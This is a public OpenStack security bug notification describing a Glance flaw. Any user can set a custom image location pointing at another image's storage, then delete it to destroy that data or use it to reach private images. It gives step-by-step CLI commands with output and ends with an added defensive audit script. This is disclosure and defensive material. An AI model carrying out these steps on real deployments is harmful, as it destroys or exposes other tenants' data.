[Openstack-security] [Bug 1546507] Re: Regular user in non-default non-recommended configuration can delete any image file

Jeremy Stanley fungi at yuggoth.org
Fri Aug 10 15:14:19 UTC 2018


Seeing no objections, I'm switching this to Public status (long
overdue!).

** Information type changed from Private Security to Public

** Tags added: security

** Changed in: ossa
   Importance: Critical => Undecided

-- 
You received this bug notification because you are a member of OpenStack
Security SIG, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1546507

Title:
  Regular user in non-default non-recommended configuration can delete
  any image file

Status in Glance:
  Confirmed
Status in Glance liberty series:
  Confirmed
Status in Glance mitaka series:
  Confirmed
Status in Glance newton series:
  Confirmed
Status in Glance ocata series:
  Confirmed
Status in OpenStack Security Advisory:
  Opinion
Status in OpenStack Security Notes:
  New

Bug description:
  This issue is being treated as a potential security risk under
  embargo. Please do not make any public mention of embargoed (private)
  security vulnerabilities before their coordinated publication by the
  OpenStack Vulnerability Management Team in the form of an official
  OpenStack Security Advisory. This includes discussion of the bug or
  associated fixes in public forums such as mailing lists, code review
  systems and bug trackers. Please also avoid private disclosure to
  other individuals not already approved for access to this information,
  and provide this same reminder to those who are made aware of the
  issue prior to publication. All discussion should remain confined to
  this private bug report, and any proposed fixes should be added to the
  bug as attachments.

  Any user can delete any public image data or get access to a private
  image just by knowing the image ID.

  Glance allows adding a custom location to an image, and this behavior
  is really harmful.

  Scenario of deleting image data in Ceph backend with current devstack
  configuration

  1. User gets list of images:
  mfedosin at winter ~ $ glance image-list
  +--------------------------------------+----------------------------+
  | ID                                   | Name                       |
  +--------------------------------------+----------------------------+
  | 0741cbc7-6b9f-4eb4-a666-9743a186849e | debian-8-m-agent.qcow2     |
  | 2e4b6dca-9700-4715-b81d-4463cd7038de | TestVM                     |
  | 39599dd3-35cb-4893-b5d4-1a17e23e538a | ubuntu14.04-x64-docker     |
  | 153397f8-d5e5-43d1-9a08-5fc52bda11a4 | ubuntu14.04-x64-kubernetes |
  +--------------------------------------+----------------------------+

  2. User requests info about public image he wants to delete:
  mfedosin at winter ~ $ glance image-show 2e4b6dca-9700-4715-b81d-4463cd7038de
  +------------------+----------------------------------------------------------------------------------+
  | Property         | Value                                                                            |
  +------------------+----------------------------------------------------------------------------------+
  | checksum         | ee1eca47dc88f4879d8a229cc70a07c6                                                 |
  | container_format | bare                                                                             |
  | created_at       | 2016-02-11T03:38:09Z                                                             |
  | direct_url       | rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d-       |
  |                  | 4463cd7038de/snap                                                                |
  | disk_format      | qcow2                                                                            |
  | id               | 2e4b6dca-9700-4715-b81d-4463cd7038de                                             |
  | min_disk         | 0                                                                                |
  | min_ram          | 64                                                                               |
  | name             | TestVM                                                                           |
  | owner            | 1c6cea59a6054372b10acbab8e25e415                                                 |
  | protected        | False                                                                            |
  | size             | 13287936                                                                         |
  | status           | active                                                                           |
  | tags             | []                                                                               |
  | updated_at       | 2016-02-11T03:38:30Z                                                             |
  | virtual_size     | None                                                                             |
  | visibility       | public                                                                           |
  +------------------+----------------------------------------------------------------------------------+

  Optional: User may try to download image file with
  "glance image-download 2e4b6dca-9700-4715-b81d-4463cd7038de --file gg"

  3. User copies direct image url: from 'direct_url' or 'locations' field
  rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d-4463cd7038de/snap

  4. User creates new image instance in db and sets custom location with "glance --os-image-api-version 1 image-create --location" (v1) or "glance location-add --url" (v2)
  mfedosin at winter ~ $ glance --os-image-api-version 1 image-create --location "rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d-4463cd7038de/snap" --disk-format qcow2 --container-format bare --name rerere
  +------------------+--------------------------------------+
  | Property         | Value                                |
  +------------------+--------------------------------------+
  | checksum         | None                                 |
  | container_format | bare                                 |
  | created_at       | 2016-02-17T11:54:41.000000           |
  | deleted          | False                                |
  | deleted_at       | None                                 |
  | disk_format      | qcow2                                |
  | id               | b12c6965-c6f8-4272-a8a0-453fc0fc03e2 |
  | is_public        | False                                |
  | min_disk         | 0                                    |
  | min_ram          | 0                                    |
  | name             | rerere                               |
  | owner            | fa343a042d2b47cbbeab08cca9913679     |
  | protected        | False                                |
  | size             | 13287936                             |
  | status           | active                               |
  | updated_at       | 2016-02-17T11:54:44.000000           |
  | virtual_size     | None                                 |
  +------------------+--------------------------------------+
  Optional: User may try to verify that image has desired location
  mfedosin at winter ~ $ glance image-show b12c6965-c6f8-4272-a8a0-453fc0fc03e2
  +------------------+----------------------------------------------------------------------------------+
  | Property         | Value                                                                            |
  +------------------+----------------------------------------------------------------------------------+
  | checksum         | None                                                                             |
  | container_format | bare                                                                             |
  | created_at       | 2016-02-17T11:54:41Z                                                             |
  | direct_url       | rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/2e4b6dca-9700-4715-b81d-       |
  |                  | 4463cd7038de/snap                                                                |
  | disk_format      | qcow2                                                                            |
  | id               | b12c6965-c6f8-4272-a8a0-453fc0fc03e2                                             |
  | min_disk         | 0                                                                                |
  | min_ram          | 0                                                                                |
  | name             | rerere                                                                           |
  | owner            | fa343a042d2b47cbbeab08cca9913679                                                 |
  | protected        | False                                                                            |
  | size             | 13287936                                                                         |
  | status           | active                                                                           |
  | tags             | []                                                                               |
  | updated_at       | 2016-02-17T11:54:44Z                                                             |
  | virtual_size     | None                                                                             |
  | visibility       | private                                                                          |
  +------------------+----------------------------------------------------------------------------------+

  5. User deletes his image. Image data will be deleted too.
  glance image-delete b12c6965-c6f8-4272-a8a0-453fc0fc03e2
  mfedosin at winter ~ $ glance image-delete b12c6965-c6f8-4272-a8a0-453fc0fc03e2
  mfedosin at winter ~ $ glance image-show b12c6965-c6f8-4272-a8a0-453fc0fc03e2
  404 Not Found: No image found with ID b12c6965-c6f8-4272-a8a0-453fc0fc03e2 (HTTP 404)

  6. Trying to access public data will fail after that.
  mfedosin at winter ~ $ glance --debug image-download 2e4b6dca-9700-4715-b81d-4463cd7038de --file ggg
  curl -g -i -X GET -H 'Accept-Encoding: gzip, deflate' -H 'Accept: */*' -H 'User-Agent: python-glanceclient' -H 'Connection: keep-alive' -H 'X-Auth-Token: {SHA1}49eea3cf13d0aba2b76665245eab8cc45fb08342' -H 'Content-Type: application/octet-stream' http://192.168.0.2:9292/v2/images/2e4b6dca-9700-4715-b81d-4463cd7038de/file

  HTTP/1.1 204 No Content
  Date: Wed, 17 Feb 2016 12:01:54 GMT
  Connection: close
  Content-Type: text/html; charset=UTF-8
  Content-Length: 0
  X-Openstack-Request-Id: req-d77148fb-fd4b-4f7b-a646-30f494c480dd

  Traceback (most recent call last):
    File "/usr/local/lib/python2.7/dist-packages/glanceclient/shell.py", line 605, in main
      args.func(client, args)
    File "/usr/local/lib/python2.7/dist-packages/glanceclient/v2/shell.py", line 281, in do_image_download
      utils.save_image(body, args.file)
    File "/usr/local/lib/python2.7/dist-packages/glanceclient/common/utils.py", line 305, in save_image
      for chunk in data:
    File "/usr/local/lib/python2.7/dist-packages/glanceclient/common/utils.py", line 478, in __iter__
      self.iterable.close()
  AttributeError: 'NoneType' object has no attribute 'close'
  'NoneType' object has no attribute 'close'

  mfedosin at winter ~ $ glance --version
  1.2.0

  Affected APIs:
  all of the v1 API, without any chance to fix it - v1 always allows setting custom locations.
  v2 API when 'show_multiple_locations' is enabled (default - False)

  Affected schemes:
  All, except 'swift+config' and 'file', because custom locations are forbidden for them.

  If a user knows a private image ID, he can build and set a custom
  location on his personal image, and thereby get access to private data.

To manage notifications about this bug go to:
https://bugs.launchpad.net/glance/+bug/1546507/+subscriptions
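
An added example, not part of the original report or of Glance's code: an operator-side audit for the condition the report describes, where two image records reference the same backend URL. It assumes image records exported with admin credentials in the v2 shape (`id`, `owner`, `locations` as a list of `{"url": ...}`); `find_shared_locations` is a hypothetical name and the sample records are constructed from values shown in the report.

```python
from collections import defaultdict

# Schemes the report lists as unaffected (custom locations are forbidden).
EXEMPT_SCHEMES = {"swift+config", "file"}


def find_shared_locations(images):
    """Return one finding per backend URL referenced by more than one image."""
    refs = defaultdict(list)
    for image in images:
        for loc in image.get("locations") or []:
            url = loc["url"]
            if url.split("://", 1)[0] in EXEMPT_SCHEMES:
                continue
            refs[url].append((image["id"], image["owner"]))
    findings = []
    for url, users in sorted(refs.items()):
        if len(users) < 2:
            continue  # only one image record points at this data
        findings.append({
            "url": url,
            "images": sorted(image_id for image_id, _ in users),
            # Different owners sharing one URL matches the reported scenario.
            "cross_owner": len({owner for _, owner in users}) > 1,
        })
    return findings


# Constructed sample records; IDs and the rbd URL are the ones in the report.
RBD = "rbd://647f7ae8-648a-44f5-83ad-f7bd2299274e/images/"
TESTVM = RBD + "2e4b6dca-9700-4715-b81d-4463cd7038de/snap"
SAMPLE_IMAGES = [
    {"id": "2e4b6dca-9700-4715-b81d-4463cd7038de",
     "owner": "1c6cea59a6054372b10acbab8e25e415",
     "locations": [{"url": TESTVM, "metadata": {}}]},
    {"id": "b12c6965-c6f8-4272-a8a0-453fc0fc03e2",
     "owner": "fa343a042d2b47cbbeab08cca9913679",
     "locations": [{"url": TESTVM, "metadata": {}}]},
    {"id": "0741cbc7-6b9f-4eb4-a666-9743a186849e",
     "owner": "constructed-owner-id",
     "locations": [{"url": RBD + "0741cbc7-6b9f-4eb4-a666-9743a186849e/snap",
                    "metadata": {}}]},
    {"id": "constructed-queued-image", "owner": "constructed-owner-id",
     "locations": None},  # an image with no data yet
]

if __name__ == "__main__":
    for finding in find_shared_locations(SAMPLE_IMAGES):
        print(finding)
```

A finding is a lead for review rather than proof of abuse; deleting any one of the listed image records removes the data the others point to.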



